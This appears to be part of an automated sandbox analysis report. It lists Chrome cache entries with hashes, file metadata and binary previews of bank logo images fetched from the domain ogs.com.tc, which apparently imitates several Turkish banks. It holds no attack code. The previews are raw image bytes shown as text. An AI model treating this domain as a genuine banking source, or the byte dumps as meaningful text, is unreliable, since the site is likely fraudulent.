    Preview:.....aExif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:10:01 17:20:05........................................................................."...........*.(.....................2...........'.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%)$.%.3:.P..W...a..c:...1...~e..}?S....g..S....}m...1..S.6..S}.[[..5.Wew:.................Z.k..

    Chrome Cache Entry: 105

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:10:01 17:48:36], progressive, precision 8, 500x200, components 3
    Category:downloaded
    Size (bytes):52012
    Entropy (8bit):7.792087654425522
    Encrypted:false
    SSDEEP:1536:pNaNX9QYIy7Gkkc6T7owWJw9gRcb/pYJxNZb1YZnvR:pIPZklUJAHb/pIxLYnp
    MD5:2C6418346997FDB03349D4F026BED400
    SHA1:EB6FC219BB66829771C3D153FD1C042AA31B368B
    SHA-256:FCC9FE739E09A1E8C65FA63D6802FE6D87AEB4BB73B3A41EAF90426A5F5D6CC0
    SHA-512:7728D1A6EF488CC401D45F5AD636FAAB3B2B4735A37C8480F75862350E10DE751187F1EB8E22E2138959B0B56E8B8BF2FB8D176BC086A50405D1C17E86E264C7
    Malicious:false
    Reputation:low
    URL:https://ogs.com.tc/assets/images/banks/ing.jpg
    Preview:......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:10:01 17:48:36........................................................................."...........*.(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%0.R.-{H=...c.Hk..y..O......:_N.8N...[.f.R...X...a...O..+.J.?.a..Z..v5&.+cZ..`;...}.....$......@:.-.

    Chrome Cache Entry: 106

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:PNG image data, 196 x 196, 8-bit/color RGBA, interlaced
    Category:downloaded
    Size (bytes):38550
    Entropy (8bit):7.976146059619022
    Encrypted:false
    SSDEEP:768:WfsaAn77REMI0/oHfogxTtPbRk/NQ5QgKeAsL9NQl/y2Z5tQzb57:WfsaA/REMIYoHf5BtNWgU+QB/5a7
    MD5:3290DEB61511EEE631E455D4D4C421CD
    SHA1:44C7B59E98A30682100ECE6C8672715F3CFDE979
    SHA-256:CB0374314E49BE2700C9F7C6C59BE3248D2658CC0F426FAED041928712B26475
    SHA-512:E92A89601EEC2916AE04AAA2C0CB82B4E141023E0A5E61BA74A67C8A38B237BF168FDEC13A324487E599D04D4E133D5D5DC9CE1EBA0052EA33924F96F9902DD5
    Malicious:false
    Reputation:low
    URL:https://ogs.com.tc/assets/images/favicon-196x196.png
    Preview:.PNG........IHDR.....................gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............IDATx...yx.......g..B..B$aMX............\.T..p........7@....*.AD.T.T.}..$.d2......e.{.{z.......d....S.N...c"..........gVIW...gj..3.Fl{`R...|=.... 0........,..&..a.U....H.*._Ie..T._../$...""2.C{ Z|..Qd.N*./"..1...d.........1......L..!"..kn O..DDT.N......W.....k...=V..o.=...T^.....H.pB..E..FO..0...e*(B.nD7.9..B!.0O....D.0.4...@..l..)r.cT..{.....0.(..W..}.....^D.w.G.2.(G...#...^|..@7h...d=...|.N..."*o.^#..........IDT.PTFFF..nu.j..|y.......".**.@S.X.|...W\.c.......W*J%".$)T^PH...@....A....SYA...9r......,..B?.....*.c2.H..h.G..0..3.)?l.....e.MMI..Y.*o.V....j.....$.z.....O.FE.E.....$I.)I.)......A.\*....i.!......`.....Bv}4....Ah..(.s*....[.I......6.8........"W..G.g.8.......1.....w^o.4..>..._Zr....@d....(.....8.R..o.}...f .QR....x..`.I...T..KDD?......0!.8._........=....p..P.BN.do^.A..r...ce..e.(Mp.`.A...>...[..I;5..-.oL...".i)D.S

    Chrome Cache Entry: 107

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:09:28 01:56:02], progressive, precision 8, 500x200, components 3
    Category:dropped
    Size (bytes):33055
    Entropy (8bit):7.604025581526417
    Encrypted:false
    SSDEEP:768:VMns/70MnsMerq/Sf9nTKl8sHM7JE3jtOAVe24HEd+:OnMTnsMer7VnTuHM7JajKR
    MD5:6B6D6494A2D5FE6292641588AF2FF231
    SHA1:D4D82A589A1E71A4C917B0AFC0267BAC3C672480
    SHA-256:C521F96B7435290FD70825A2D5E45A10DC3789FEFD0D98851F72330C1D6F7A11
    SHA-512:31E4C7B87A5D90EF6A419B6A56A2BDE528E1C9368C713F1FB87A16333FF77C021BF1874B5BB74939175D46454810452582081ADB0FD5A11D6BA8844F4C5714E8
    Malicious:false
    Reputation:low
    Preview:......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:09:28 01:56:02........................................................................."...........*.(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJIgY.....].C..o-u..Q.rT..7........Y...C.=....f..7?.d.?.7........Y...K.s}]...,o.u..$8..}...o.S...N.J..T.....&....n..'...Y..p7...(..1=..I$.B.I$...I

    Chrome Cache Entry: 108

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:10:01 17:20:05], progressive, precision 8, 500x200, components 3
    Category:downloaded
    Size (bytes):20736
    Entropy (8bit):7.207645802514661
    Encrypted:false
    SSDEEP:384:8UVb/iZjUVynSIFV8ZImDkUinAj5B3YWUp32XjW+ke4g:8UN/yUYHOjpiLWUp2XjWXg
    MD5:7E0925A6F6A401C7E8721B9836FC721F
    SHA1:9A0B48E0BD35CCC96C5391B2A30E8260098D7DF7
    SHA-256:CA3770BB64EF72AB2C7D2E1B28639FE9145970310EEDEF1657CB2B81BB3AA4C5
    SHA-512:09C0B4EE63589B8E5907DF1AF95DE667754532F491F786B6F7FC56E71204748D295FA48ABF262A6EA93E0EB8E6F05ED9666984F3330393E9AEAF2BBB9D8D893D
    Malicious:false
    Reputation:low
    URL:https://ogs.com.tc/assets/images/banks/anadolu.jpg
    Preview:.....aExif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:10:01 17:20:05........................................................................."...........*.(.....................2...........'.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%)$.%.3:.P..W...a..c:...1...~e..}?S....g..S....}m...1..S.6..S}.[[..5.Wew:.................Z.k..

    Chrome Cache Entry: 109

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
    Category:downloaded
    Size (bytes):4990
    Entropy (8bit):7.944457042989119
    Encrypted:false
    SSDEEP:96:0idZaenJJihOgLDEegvH0vDp0iF1+oHgBrqfgaOFZVSe7+:dnaeJAH2HmD32oABrWgaOF
    MD5:FD5E77DC351059471EEBC68959B970AC
    SHA1:A6E147F8E19EC340715A8180F9DC0A3171C1D159
    SHA-256:D3F148ED9EDFB70EA4138F1D06B50AD305DA5FCE6F8C4155642C84793DADACC2
    SHA-512:D74550EA1FD4D0EE73DDA1D21294D2C06D23417ED2DB7871C29D6B0E27A56A36DC34901DDAA2A7DACD4DECB94A937DF49D236B815B58F7AE38ACC874DEC0A5B8
    Malicious:false
    Reputation:low
    URL:https://ogs.com.tc/assets/images/banks/isbank.jpg
    Preview:RIFFv...WEBPVP8 j...p`...*....>I$.F".!."...P..en.|...->..K.....?.}.*..?......S...z...............w.O....._...z............>.?.[=.........................{..9.-.....o...w.O.?.?._.....?..........N..~R...O.......^J..}....7.w...?..5....P/.?..w.......D.E......./...x..8....o.~4./........e.............O.?..|..-...7.[.o...s?.?..[2(..w......w......w......w......w.....>......>....i..>...?5.......\.........".d=vO...CI.../k...Y.[..3.xy._..Gtah.......m...p.x...uBZ................A.#.i\b...+-.....S.~...k=W..ZF..@...;..q......'...7+a.]H}...d .....8.p..=.[BX..w.6h.@.E..R. ...V.w..~......-.7.d)..O./.,K.2er3{6J.`..5c.:..k..X.l.!.....j.h(..h:.....:...4(..c.H......J.^p.......Q._.....5a{\...7.[& .o[.=../.."As6..~}.].qg~}.].eFW.".K...,....,....,....,....,....,....,..x........ ..4.o........"._.@`.)...Y..v.+#np&......>.T..d...u..3]...s%gv.d..|=(u7.D/...D.d.@.-.e....2.}..1c.g".3j:h1..V...N._...9i .+7.{..}-...T....=~F.!2.v.J..t...L...#...:.A7^..X.h..d...E.......

    Chrome Cache Entry: 110

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:10:01 17:19:10], progressive, precision 8, 500x200, components 3
    Category:downloaded
    Size (bytes):46102
    Entropy (8bit):7.754632398541905
    Encrypted:false
    SSDEEP:768:AXle3/a8XlekUl9YkExyc2wnBGsNKgiaCZXqgTnfjB3gZWr5TN/M6TJ6Ud6bPC:AXleC8XlekK9cxPBGsNKJdZ9Tn93GWr/
    MD5:6CFFC318B97A4D585F3B967257F7E3B1
    SHA1:6B3B875B2D43D05C90DD5F1DF832473B1B369D42
    SHA-256:F420DA08280CB364B9DD6EF4C6404923854A0E449DEAA93F7A97044BED52B463
    SHA-512:C37D0F4267773271D747A78A26D1D00C6ABFEB2AF3C08409925432C492B91DB7827AC48EA7B11125FCE66CC248EFB858A18F11FD8F8F1204C78E53B32C837E0B
    Malicious:false
    Reputation:low
    URL:https://ogs.com.tc/assets/images/banks/alternatif.jpg
    Preview:......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:10:01 17:19:10........................................................................."...........*.(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%9.Yz..../....0.gY.........\....\.....pz..}....^n......7../}^....D...O3#......*\2..5...Ml.....o..}...

    Chrome Cache Entry: 111

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:PNG image data, 165 x 40, 8-bit colormap, interlaced
    Category:dropped
    Size (bytes):2220
    Entropy (8bit):7.8303895814946145
    Encrypted:false
    SSDEEP:48:3YniT3/OGVBWNNr5Ko9HRoOcqAfuvQubCdcjYEvvcl8J4D8DbSEz:j2GfWNNpmq6uYcFnc+WDo
    MD5:FDAC5F9234036C2502CEE52C30F7774B
    SHA1:CD24A9F757055E2EF598BE0D164934C6A1B4E3CD
    SHA-256:473F0D637169B8B400874FFB0C487DFC5F4BC544E8BFEBE98502A6A5CEB781E7
    SHA-512:6353199AB3414FE3D72BF07359D54B3D74D9B02153F0495D38E99EC3BD5BDAB3415425C0BDA4612388409194948D9E1E137D6F7FD5E76497ACC698AD22237C6D
    Malicious:false
    Reputation:low
    Preview:.PNG........IHDR.......(........x....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE.................xy.oo.ij.de...........ef.....................ML.(".SS.|}.TT..........0,.$...........VW.JJ......)....HH.....52....QR.75.....&......%..uu.......3/.......{|.......ff..........................rr..?=...................B@.YY....,'.~........2...........`a....+&.......:8.FF.......DD.......[[.y{....;9....]^....kl.......z{....(!.=;........................d..\....bKGD....H....tIME.......:.+.....IDATX..Xi[.I..@...D.#.W&.....D0.A ....4.gb...o..^......CwuOMQ.U]]=D..N.W9.~}h..'.D..:.<uQ.p.4.%.A.G.k...D...<.|....fck.J@Ty.|.f..B. .I5..(...[...47Q.....1..bUk.Z.z].......s5|^....o..9N...+V...6,..\.0Do..Y..@n{...#.qiN3..!*(...[@r.3x..../.M....Wc....a}..Y..c....X=.....].qo.,p.....8.).M..]1......\......q.....(Ay........B8PB.%...P?B....."...#.Y.S`.|.=..]..0Y.F..n.`......r.v...,<..&.`6j.@..B. /.K...c..=l..4.....Kr.l....z...L.}....m...N.q.&..@..^...L.E

    Chrome Cache Entry: 112

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
    Category:dropped
    Size (bytes):4042
    Entropy (8bit):7.944757222253673
    Encrypted:false
    SSDEEP:48:s4M0dukGQY5v9g+Ca2TWLwk75UOlI6QEpWgDDwrYhwxf8wHG8umz00og2SBtKiCL:s4MW8vKFqLqX61pm8Au2H4iCGQ
    MD5:F188C8BDEC3EF94C06AAEF6EE7381867
    SHA1:36DD9ECD9ECCE60496899DCC092508D06ADD77DD
    SHA-256:80F27648BA9BCFE1F3E29EAA9EA2B0C87C815CAFAA0D708042D0EE926E295B14
    SHA-512:9EFD2C067F15AC9A8C543D8D056655CB5EC18A79F72CF1F7320A0AB14077EB5828AEE2295CAD560BD62ED59205211D959540E9692F406278181FD8205DFA4073
    Malicious:false
    Reputation:low
    Preview:RIFF....WEBPVP8 .....X...*....>I$.E..!...H(....p.X.....r..7{o....s......Q.........o0..^..`?_.e....~......w...u..........`...=6.t...........=......N.?t{S...~.~w.......;....._.\s ..G....T2..i.'.'.m.?..r.../._.C.Q...3.-...O..j.E.K.~}.{......../p^..{......../p^..{......../p^..{......../p^.......d....8j.$..3...~.4..}....".B.....9..tdQ.<.7.F.9.v*+Z^..O.9...M=.JqW..!w...]...*t.N..}..h\..>MN....h.c.oA....5s......^..=3...#...x.l6..."a?..!~.'.W.{...<..c.v...r*%m..cq~..c^... .......Os....nR.'..h.6..;........{.T...wC....J.i2.N.8`..J......y.v........!...u.N0(..MHF..x.7.N .Uw.<!...`!.....[0x.h..@+V"......0xg%z........A. .<.x...q........DCw..]>.9W..p^..{......../p^..{......../p^..{......../p^..{........).............B}.....?|.....:.....r]N#AP.G....|.^.z...F.......y.....u..lqj.M'.$..:...d.M.|.VXv.a1..v. M.-.b...)..h1...5.I.p.....6.L..g.t..Q.f....Q!L.$......n...W.IH.........6b.B......q.a.].R.....J4.....u1P.D...F\..P...."s.%c..`........n...:........]2 \.

    Chrome Cache Entry: 113

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:SVG Scalable Vector Graphics image
    Category:dropped
    Size (bytes):8746
    Entropy (8bit):3.948607010097119
    Encrypted:false
    SSDEEP:192:Ww8o3Nd5aQk6tjbzOt1SSVZ7u5esh07S01XxnUF:W+3rMCjGt1SSHMesG7D1hnUF
    MD5:E5743937C99F16C9355FAEB1F0F43747
    SHA1:FBC44E8BB5CFD1C55FC7D04B844802B772C197B7
    SHA-256:39966EC7EEA8F508184CEF9F98895A0E8D74E3328A43CC8A93C528CFCA888691
    SHA-512:4A948D98FAD13E2DEFE50BAD24B6A681E79C6A0C6FB373AAF87B37F167B9AA25B51A305E79690B6865DDE80547AADD6A5A06704553AC0F716E878243071C8ADF
    Malicious:false
    Reputation:low
    Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 672.5 100"><path fill="#E6E6E6" d="M86.1 26.4c-.1-1-.9-2-2-2.3l-38.3-13c-.6-.2-1.4-.2-2.1 0l-38.4 13c-1 .3-1.9 1.2-2 2.3C.6 52.5 5 72.3 16.8 85.5 28.9 98.7 44 99.8 44.7 99.8h.4c.6 0 15.8-1 27.8-14.3C84.6 72.3 89 52.4 86.1 26.4z"/><path fill="#FFF" d="M87.2 17.1c-.1-1.1-.9-2.2-2-2.5L46.1.4c-.6-.2-1.4-.2-2.1 0L4.8 14.6c-1 .3-1.9 1.3-2 2.5-3 28.5 1.5 50 13.6 64.2C28.7 95.8 44.1 97 44.8 97h.4c.6 0 16.1-1.1 28.4-15.6 12-14.3 16.6-36 13.6-64.3z"/><path fill="#EA212E" d="M82.2 20.2c-.1-1-.8-1.9-1.7-2.2L45.6 5.4c-.5-.2-1.3-.2-1.8 0L9 18c-.9.3-1.6 1.2-1.7 2.2-2.7 25.3 1.3 44.4 12 57.1C30.2 90.2 44 91.2 44.5 91.2h.4c.5 0 14.3-1 25.2-13.8 10.7-12.8 14.7-32 12.1-57.2zM31.2 82c-.5-.3-.8-.5-1.3-.8 9.3-2 16.9-5.9 23.8-10.1-6.2 4.1-13.8 8.3-22.5 10.9zm44.7-42.7c-1.3 2.8-2.7 5.1-4.5 7.5-3.6 4.5-7.8 8.2-12.6 11.5-4.8 3.4-10 6.3-15.6 8.8-2.7 1.2-5.8 2.4-9.2 3.2-3.1.8-7.1 1.6-10.7.8-1.4-.3-2.6-.6-3.6-1.3-1.2-1.9-2.2-4-3.1-6.2.1-2.7 1.5-5.1 2.7-7.1 3.1-4

    Chrome Cache Entry: 114

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
    Category:downloaded
    Size (bytes):4050
    Entropy (8bit):7.9449549923866
    Encrypted:false
    SSDEEP:96:I6zgu0J3Vwy7fD47SdIsVr4EEAzvpUg2yUR6g9qQV2kHEVdisb:IOg5D9k/S5dlURL92Fmsb
    MD5:C9D61E6409128B3B695DA5D0F577709D
    SHA1:DF9F6B72F626A34E1A0F7C5E09198616CD055DC6
    SHA-256:4C353EB3748F302E18D210A9AB7CC1BA7E1B28A7357E038782E4E7A88088547A
    SHA-512:4587B9784B632CDC4AF5427F7E6B735957BF1EF06FDC0B40F6ED3CD45F57E047A07C168072211A835272C703EB6AD4B841A49CB311B2B7B74DEB44A1B409D07D
    Malicious:false
    Reputation:low
    URL:https://ogs.com.tc/assets/images/banks/kuveyt.jpg
    Preview:RIFF....WEBPVP8 .....U...*....>I$.F".!.!...P..en.v....}...~Z{*U?..........<..K..._.?(...n......O...G.....<..9.....w......q.................[...;.....o.o.o....._.?.~...u..k..j?..$..|..g0'......a...Ey......@.....}..8.+.w.....~5.B...o.....c..-.O.....0...w..h_..f/.`.\Z..`9.e......0..2..Nmv..n.|..6.yL.7..AS.]....._ ...S.../.P.7g.0 %.........D5.sp...9...`9.........,f....7....(.G..6.q...&..."!...........H..0.u,X.Y$..U.....<dy. .ZR.E|5..=..g......L.6....D'#.!..P.R~..B....M.x...[M.#....-B...:..7...W..@.hm>N...zW.~.@.PT3.Y........&.. ... D..p...'....{...|.[,.n..6.%..k..D.H........<&....a.N.Z..#T....3..*....2sC......./".S.C.C...%AS.]....._ ...S.../.T..o)....*sk...sp...9...`9.e......0..2............a..?......1.P...I=N....4...N...........J..h.....V..~.,.0...GD.i.......R.a.."..>..p2...O^S...........@.l.W..sC..O.X.Qh....I..0..b&...jS{.LA.|/G......w.t8.....O..Y9c..C.!7....b1|%9r.2*:..p...rxK.^V.t._0.....p.R._..............i$..K.p....2..[_..l....)..A)r.Vq

    Chrome Cache Entry: 115

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
    Category:dropped
    Size (bytes):3510
    Entropy (8bit):7.923209159875537
    Encrypted:false
    SSDEEP:96:H/Dv4WxcN41DkQKrPidlfMhpziZcGnWyQ4Z5DOp1qoptEjm2NavQ:H/bOkhKrqr0P83Z56zpp2fcQ
    MD5:43C944FA568502BAEDCCE9455D812C3C
    SHA1:D9B1CFCAD1A4AF9CE14AF46B37D91DD8551AE9BC
    SHA-256:EE9DF8FAF35A0992E4DBFFC2DF4BB02FD6691184766D2915CF2E19BC4E906FE3
    SHA-512:C2CB9BFB37849BE3DEE22092BA08DC270A8F80070A2F55345D47CC209F4A71E25D1FAC83699D3016CF4A3EB271195A0FAD147D88E41CB955787B9F312A68413E
    Malicious:false
    Reputation:low
    Preview:RIFF....WEBPVP8 .....R...*....>I$.F".!.!5..P..gn.v....K.O}..wgn:t.|.o._._.;H..~...................p....}.?Rz...?[}4.a...d.k...X~..P...._.?...............OS...z.....G._.|......G......Z.Xq.i.`^.|..'....M{......O..A.*..........?.~`>....../.....^... ?p.-@.z....U.A.....T...._..P...-~@U@.z....U.A.....T...._..P...-~"G.y.{-../?.......U.A.....S.m.I...`.Q.m..N......P5.@.1.H9..y7.~.9..9..(?W.......+o..ky.LK... z..v.).U.A..Y7.....'-..........A.B.z.r....z.6V)6,8........3...jR.j.c....CuW...5..'.p.....R.M....-~>.".............M[....Q...*.j..xh5."..:.+.9..[.g.!....\Q?WY.....Rv"...fK6a.......K_..P..S..s..#.5 .h.T...._..P...-~@U@.z....U.A.....T...._..P...-~@U@.z....U.A...................@L..mt....!..H-{....t._.P......}Es.m.{u......$.o.......M..H......;.p......{..H]..~X!.].nk+.O....}... ..C.....s?....F....XI.....+.y..2..-P>....2..wE.4..)75(..4....&...?...2.rI..WCw.I.1.....3.Q.t....t...F.........rWf.....Y;.~.'B4/."..(.K..........?..p:.....H.'......Ju..*p..i..]..)a

    Chrome Cache Entry: 116

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
    Category:dropped
    Size (bytes):4904
    Entropy (8bit):7.94930581705637
    Encrypted:false
    SSDEEP:96:M6opqi3R4YgHM9ddzxgiaqkElcwTUwFySe2v8iwAohflvcrKfn9z1k:M6oBaP+zxgiaqkEgw/eo8tvPqKfn9Rk
    MD5:A82F67A8BCFFF4EA7793BB3FCC00CB4D
    SHA1:DECC78E3F9341338EB0AB9757735E2338A5DE451
    SHA-256:871657EF72C4641D784288FBCCBC14775B72A07437C69E2E29D7A2AE0BED9F73
    SHA-512:10C19D9A4BFCB1033F1AE5DEBF41821597A10FA83896C73C1CABF421F441150D9A3037B1E2E1E0F8F0AB77515346201A17ED89652918F63EEE86E89387E6EA18
    Malicious:false
    Reputation:low
    Preview:RIFF ...WEBPVP8 .....a...*....>I$.F".!.!.Y.P..en.uK..~...RN....{.O.]........v......=.<K.......~......w...`?...:G.....6...S...............=........Y...7.7.o....._..P........................?..T......N.3..._.?e.,...!....c..........?.c...}..._._X...E}....y.?.O...~!?J.m..........................>...?......w.7...#..C...L..!.}...h...:....}...h...:....}...h...:....}...h...:.....y....L.A....2. ..%0P`.y...|@..I..Eq.........T.'.c...B.iA......D..F......|.9....[..+9.). ...>u....`l..U..$~c...".c./szwR........-..>.&......pH....W.cR....1..."U..66}...9.1?.Ss.M..w.%G..ZUq..6.....1.E....Ku.t...%..S.m...s.5...;.:...`d....s......`....C.eK...........-.......qDe. D..%?:...&3.G.+....C...W..........r..A..u....2}...!C-*%...p....kk6.q.S..|;.uc..X.GV>...uc..X.GV>...uc..X.GV>...uc..X.GV>...t.....%........DS...1b..>X.......|.)..<.\j....`t.D....L..#..0.e..v..L!......xC..$.B.W...c..#.:....X...'e.)B.X`...I.....]\'Q..Y:R.R.t.Xe.....c...U.A..A.2.(4...}.^.V..h541./.........

    Chrome Cache Entry: 117

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
    Category:downloaded
    Size (bytes):4904
    Entropy (8bit):7.94930581705637
    Encrypted:false
    SSDEEP:96:M6opqi3R4YgHM9ddzxgiaqkElcwTUwFySe2v8iwAohflvcrKfn9z1k:M6oBaP+zxgiaqkEgw/eo8tvPqKfn9Rk
    MD5:A82F67A8BCFFF4EA7793BB3FCC00CB4D
    SHA1:DECC78E3F9341338EB0AB9757735E2338A5DE451
    SHA-256:871657EF72C4641D784288FBCCBC14775B72A07437C69E2E29D7A2AE0BED9F73
    SHA-512:10C19D9A4BFCB1033F1AE5DEBF41821597A10FA83896C73C1CABF421F441150D9A3037B1E2E1E0F8F0AB77515346201A17ED89652918F63EEE86E89387E6EA18
    Malicious:false
    Reputation:low
    URL:https://ogs.com.tc/assets/images/banks/halk.jpg
    Preview:RIFF ...WEBPVP8 .....a...*....>I$.F".!.!.Y.P..en.uK..~...RN....{.O.]........v......=.<K.......~......w...`?...:G.....6...S...............=........Y...7.7.o....._..P........................?..T......N.3..._.?e.,...!....c..........?.c...}..._._X...E}....y.?.O...~!?J.m..........................>...?......w.7...#..C...L..!.}...h...:....}...h...:....}...h...:....}...h...:.....y....L.A....2. ..%0P`.y...|@..I..Eq.........T.'.c...B.iA......D..F......|.9....[..+9.). ...>u....`l..U..$~c...".c./szwR........-..>.&......pH....W.cR....1..."U..66}...9.1?.Ss.M..w.%G..ZUq..6.....1.E....Ku.t...%..S.m...s.5...;.:...`d....s......`....C.eK...........-.......qDe. D..%?:...&3.G.+....C...W..........r..A..u....2}...!C-*%...p....kk6.q.S..|;.uc..X.GV>...uc..X.GV>...uc..X.GV>...uc..X.GV>...t.....%........DS...1b..>X.......|.)..<.\j....`t.D....L..#..0.e..v..L!......xC..$.B.W...c..#.:....X...'e.)B.X`...I.....]\'Q..Y:R.R.t.Xe.....c...U.A..A.2.(4...}.^.V..h541./.........

    Chrome Cache Entry: 118

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:10:01 17:34:34], progressive, precision 8, 500x200, components 3
    Category:dropped
    Size (bytes):24936
    Entropy (8bit):7.391242814683689
    Encrypted:false
    SSDEEP:384:2bFO/iaEbFonMCUVzxO7NrKC85mpXXlxpJfVmqXkw9x8B:CFO/mFogxOJrFXxmeks8B
    MD5:2C60AD4276905C8109BB3981C24BB068
    SHA1:FB8C7C8F07557FF9776D9A95CB50A946A3D326BB
    SHA-256:497B1CE30CDF438891FC6F8DC9250206822ACC3E0F3D81D88599C6E6DC177795
    SHA-512:115BDDD2136E119C112D94560B83F24C84A49909F2172A40C7E75FE82F8A952B7B20ABFEC924BB4126EE3499B26865760AA33291302D236BE7D0B4A30B7CE003
    Malicious:false
    Reputation:low
    Preview:.....ZExif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:10:01 17:34:34........................................................................."...........*.(.....................2........... .......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%)$......j]..........k.B.r_m;.G.~.....z...%=.K....0:..O..e...m6_.k.h..c.m.j.k..z.U..Y.......__....

    Chrome Cache Entry: 119

    Download File
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (571)
    Category:downloaded
    Size (bytes):10068
    Entropy (8bit):4.597224404478738
    Encrypted:false
    SSDEEP:192:cl5Ryqo9J7oT6mEY2JQPRjSJQPMJQPR3SwXRMLZJQ+kB:RY7SwuBe
    MD5:20A9E2A223ED126215AEEEE59F03C375
    SHA1:66B4A73845E187910D7C9058F2CDD4D8F8254B2B
    SHA-256:ADD940A86AA9563753AF3FDEFB4B3D8394068FBC6CB1C9B972D5FEF41E834420
    SHA-512:1991A51B9E0FE510CE311852D506464E638D47B296354CEB00A4BD7170C255B4075DF92563FC8B76BB9EFDE3EA3600E82E08EB5C7AE6ED83F7A7E4E52EC819DB
